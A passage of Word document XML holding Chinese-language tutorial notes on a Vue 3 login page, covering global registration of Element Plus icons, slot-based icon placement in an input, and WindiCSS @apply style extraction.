      </w:r>
    </w:p>
    <w:p w14:paraId="6656E33B" w14:textId="77777777" w:rsidR="005463D1" w:rsidRPr="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B95C489" w14:textId="00FCDAD8" w:rsidR="00DA6FB9" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>直接在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t>.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中引入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44530F4E" w14:textId="60FC7B79" w:rsidR="005463D1" w:rsidRPr="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005463D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import * as ElementPlusIconsVue from '@element-plus/icons-vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA18BDF" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5414BF" w14:textId="77777777" w:rsidR="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import {createApp} from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ACE491" w14:textId="77777777" w:rsidR="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import ElementPlus from 'element-plus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC947D8" w14:textId="77777777" w:rsidR="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import 'element-plus/dist/index.css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D61A03" w14:textId="77777777" w:rsidR="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import App from './App.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB0B856" w14:textId="77777777" w:rsidR="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import router from './router'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEDC55D" w14:textId="5897871D" w:rsidR="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005463D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import * as ElementPlusIconsVue from '@element-plus/icons-vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EAC867" w14:textId="5D2B137D" w:rsidR="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005463D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const app = createApp(App)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5216E977" w14:textId="77777777" w:rsidR="005463D1" w:rsidRPr="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005463D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="005463D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>引入全局图标</w:t>
      </w:r>
      <w:r w:rsidRPr="005463D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> icon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54075019" w14:textId="77777777" w:rsidR="005463D1" w:rsidRPr="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005463D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>for (const [key, component] of Object.entries(ElementPlusIconsVue)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3798AF11" w14:textId="77777777" w:rsidR="005463D1" w:rsidRPr="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005463D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    app.component(key, component)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28095535" w14:textId="3F3486FB" w:rsidR="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005463D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F50780" w14:textId="079A22C5" w:rsidR="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>app.use(router)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65892429" w14:textId="25F37347" w:rsidR="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>app.use(ElementPlus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C7FF2D" w14:textId="6C3AC70F" w:rsidR="005463D1" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import 'virtual:windi.css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7FA427" w14:textId="6E952F0C" w:rsidR="00DA6FB9" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>app.mount('#app')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC96A93" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600A4D5C" w14:textId="27642650" w:rsidR="00DA6FB9" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以不引用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646B8F6" w14:textId="29884536" w:rsidR="00DA6FB9" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如可以直接注释</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6232767A" w14:textId="1FD64DD3" w:rsidR="00DA6FB9" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005E07D6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>// import { User, Lock } from '@element-plus/icons-vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F8209A" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E079E91" w14:textId="7D87E1D3" w:rsidR="00DA6FB9" w:rsidRDefault="005E07D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是注意，使用图标则不能写成单一小元素，而必须使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法插入，如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AC8F32" w14:textId="77777777" w:rsidR="005E07D6" w:rsidRDefault="005E07D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFE59D7" w14:textId="77777777" w:rsidR="005E07D6" w:rsidRDefault="005E07D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="005E07D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> v-model="form.password" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请输入密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" type="password" :prefix-icon="Lock" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC95D6D" w14:textId="77777777" w:rsidR="005E07D6" w:rsidRPr="005E07D6" w:rsidRDefault="005E07D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="005E07D6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;template #prefix&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A121403" w14:textId="77777777" w:rsidR="005E07D6" w:rsidRPr="005E07D6" w:rsidRDefault="005E07D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E07D6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                            &lt;el-icon&gt;&lt;User /&gt;&lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429682D8" w14:textId="77777777" w:rsidR="005E07D6" w:rsidRDefault="005E07D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005E07D6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23266473" w14:textId="77777777" w:rsidR="005E07D6" w:rsidRDefault="005E07D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="005E07D6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/el-input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507CB24B" w14:textId="12E84A4D" w:rsidR="00DA6FB9" w:rsidRPr="00DA6FB9" w:rsidRDefault="005E07D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD9BE6B" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F6AE0D8" w14:textId="4931F16D" w:rsidR="007F2C96" w:rsidRDefault="005E07D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005E07D6">
        <w:t>:suffix-icon="Calendar"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种的，图标不显示了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7144D5CE" w14:textId="77777777" w:rsidR="005E07D6" w:rsidRDefault="005E07D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBDA9D0" w14:textId="6C660EDA" w:rsidR="00241528" w:rsidRDefault="00241528" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="690" w:name="_Toc159780120"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:t>apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现样式抽离</w:t>
      </w:r>
      <w:bookmarkEnd w:id="690"/>
    </w:p>
    <w:p w14:paraId="240383D2" w14:textId="77777777" w:rsidR="005E07D6" w:rsidRDefault="005E07D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2472667B" w14:textId="747EC798" w:rsidR="005E07D6" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在标签里太多了，一长的字符串，所以我们可以利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windicss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令，抽离下这么长的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6F8B84" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48B87928" w14:textId="1E61FEE7" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>login.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345EC614" w14:textId="00F9A2CA" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正文中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性，自定义名字为</w:t>
      </w:r>
      <w:r w:rsidRPr="003D73B1">
        <w:t>login-container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E1C4DC" w14:textId="26993F9D" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003D73B1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-row class="login-container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A49EC5D" w14:textId="19F8235B" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后同文件下写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，别忘了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:t>apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令后面写个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6847AE17" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRPr="00C02AA6" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02AA6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EE863E" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRPr="00C02AA6" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02AA6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.login-container{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A0C2D9" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRPr="00C02AA6" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02AA6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    @apply min-h-screen bg-blue-400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2760063B" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRPr="00C02AA6" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02AA6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FD675B" w14:textId="29DBC19A" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C02AA6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3472D10C" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33CA7BAC" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F745CE" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C1A22C" w14:textId="4DD7240C" w:rsidR="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总体写下来如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C773858" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B950F3" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.login-container{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746350F7" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    @apply min-h-screen bg-blue-400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21261A01" w14:textId="77777777" w:rsidR="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B398BD1" w14:textId="6850EC0D" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">/* </w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>大意是，</w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ogin-container</w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>下有个自定义的</w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>left</w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC05F05" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.login-container .left{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680A27AB" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    @apply  flex items-center justify-center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A0B7B1" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B3E2B4" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
